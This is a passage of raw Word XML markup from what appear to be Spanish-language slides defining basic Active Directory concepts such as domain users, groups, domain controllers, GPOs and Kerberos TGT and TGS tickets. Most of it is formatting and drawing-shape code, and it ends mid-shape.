          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="112D0CD1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1958"/>
        </w:tabs>
        <w:ind w:left="1958" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Las entidades físicas que componen una red organizada</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08516A9F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="66"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36740E2F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo7"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1958"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="1958" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Usuarios de dominio </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b w:val="0"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D50F24D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2678"/>
        </w:tabs>
        <w:spacing w:before="42"/>
        <w:ind w:left="2678" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Cuenta de usuario que puede autenticarse en máquinas/servidores del dominio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456C238D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="609CBF2C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="785EEAD9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo7"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1958"/>
        </w:tabs>
        <w:ind w:left="1958" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Grupos de dominio (grupos globales):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C648E4D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2678"/>
        </w:tabs>
        <w:spacing w:before="45"/>
        <w:ind w:left="2678" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Se puede utilizar para asignar permisos para acceder a recursos en cualquier dominio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B40965" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DD95768" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75FB2A50" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo7"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1958"/>
        </w:tabs>
        <w:ind w:left="1958" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Equipos de dominio </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b w:val="0"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9330BB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2678"/>
        </w:tabs>
        <w:spacing w:before="42"/>
        <w:ind w:left="2678" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Máquinas que están conectadas a un dominio y, por lo tanto, se convierten en miembros de un dominio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC13E8B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId65"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="700" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:pgNumType w:start="50"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C890E58" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo7"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1057"/>
        </w:tabs>
        <w:spacing w:line="663" w:lineRule="exact"/>
        <w:ind w:left="1057" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Controlador de dominio </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b w:val="0"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F83A7B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="170"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DE86BE8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:line="189" w:lineRule="auto"/>
        <w:ind w:left="2139" w:right="854"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Servidor ubicado centralmente que responde a las solicitudes de autenticación de seguridad y administra varios recursos como computadoras, usuarios, grupos, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48807A59" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="193"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03E284B9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo7"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1058"/>
        </w:tabs>
        <w:ind w:left="1058"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Objetos de directiva de grupo (GPO):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240A5F43" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="68"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CF54DB4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:ind w:left="2139"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Colección de políticas que se aplican a un conjunto de usuarios, dominios, objetos de dominio, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B2CD5B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="55"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B7CE32A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo7"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1058"/>
        </w:tabs>
        <w:ind w:left="1058"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Boleto de Concesión de Boletos (TGT) </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b w:val="0"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1123AA90" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="142"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="205303CC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="2139"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Ticket utilizado específicamente para la autenticación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC56667" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="174"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EF64739" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo7"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1058"/>
        </w:tabs>
        <w:ind w:left="1058"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Servicio de Concesión de Billetes (TGS) :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59172C53" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="164"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="690C4517" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:ind w:left="2139"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Ticket utilizado específicamente para la autorización</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C37480" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="240" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6359109D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8536"/>
        </w:tabs>
        <w:ind w:left="122"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:position w:val="31"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:position w:val="31"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="485339648" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="30914C46" wp14:editId="5127DFC9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>77469</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>940308</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="11089640" cy="516001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89640" cy="5160010"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="11089640" cy="5160010"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="123" name="Graphic 123"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3818255" y="490727"/>
                            <a:ext cx="6126480" cy="365760"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="6126480" h="365760">
                                <a:moveTo>
                                  <a:pt x="6126226" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3063113" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="365760"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3063113" y="365760"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6126226" y="365760"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6126226" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="124" name="Graphic 124"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3818255" y="856500"/>
                            <a:ext cx="6126480" cy="330200"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="6126480" h="330200">
                                <a:moveTo>
                                  <a:pt x="6126226" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3063113" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="330187"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3063113" y="330187"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6126226" y="330187"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6126226" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="CFD4EA"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="125" name="Graphic 125"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3818255" y="1186700"/>
                            <a:ext cx="6126480" cy="330200"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="6126480" h="330200">
                                <a:moveTo>
                                  <a:pt x="6126226" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3063113" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="330187"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3063113" y="330187"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6126226" y="330187"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6126226" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="E9EBF5"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="126" name="Graphic 126"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3818255" y="1516773"/>
                            <a:ext cx="6126480" cy="330200"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="6126480" h="330200">
                                <a:moveTo>
                                  <a:pt x="6126226" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3063113" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="330187"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3063113" y="330187"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6126226" y="330187"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6126226" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="CFD4EA"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="127" name="Graphic 127"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3818255" y="1847024"/>
                            <a:ext cx="6126480" cy="570230"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="6126480" h="570230">
                                <a:moveTo>
                                  <a:pt x="6126226" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3063113" y="0"/>
                                </a:lnTo>
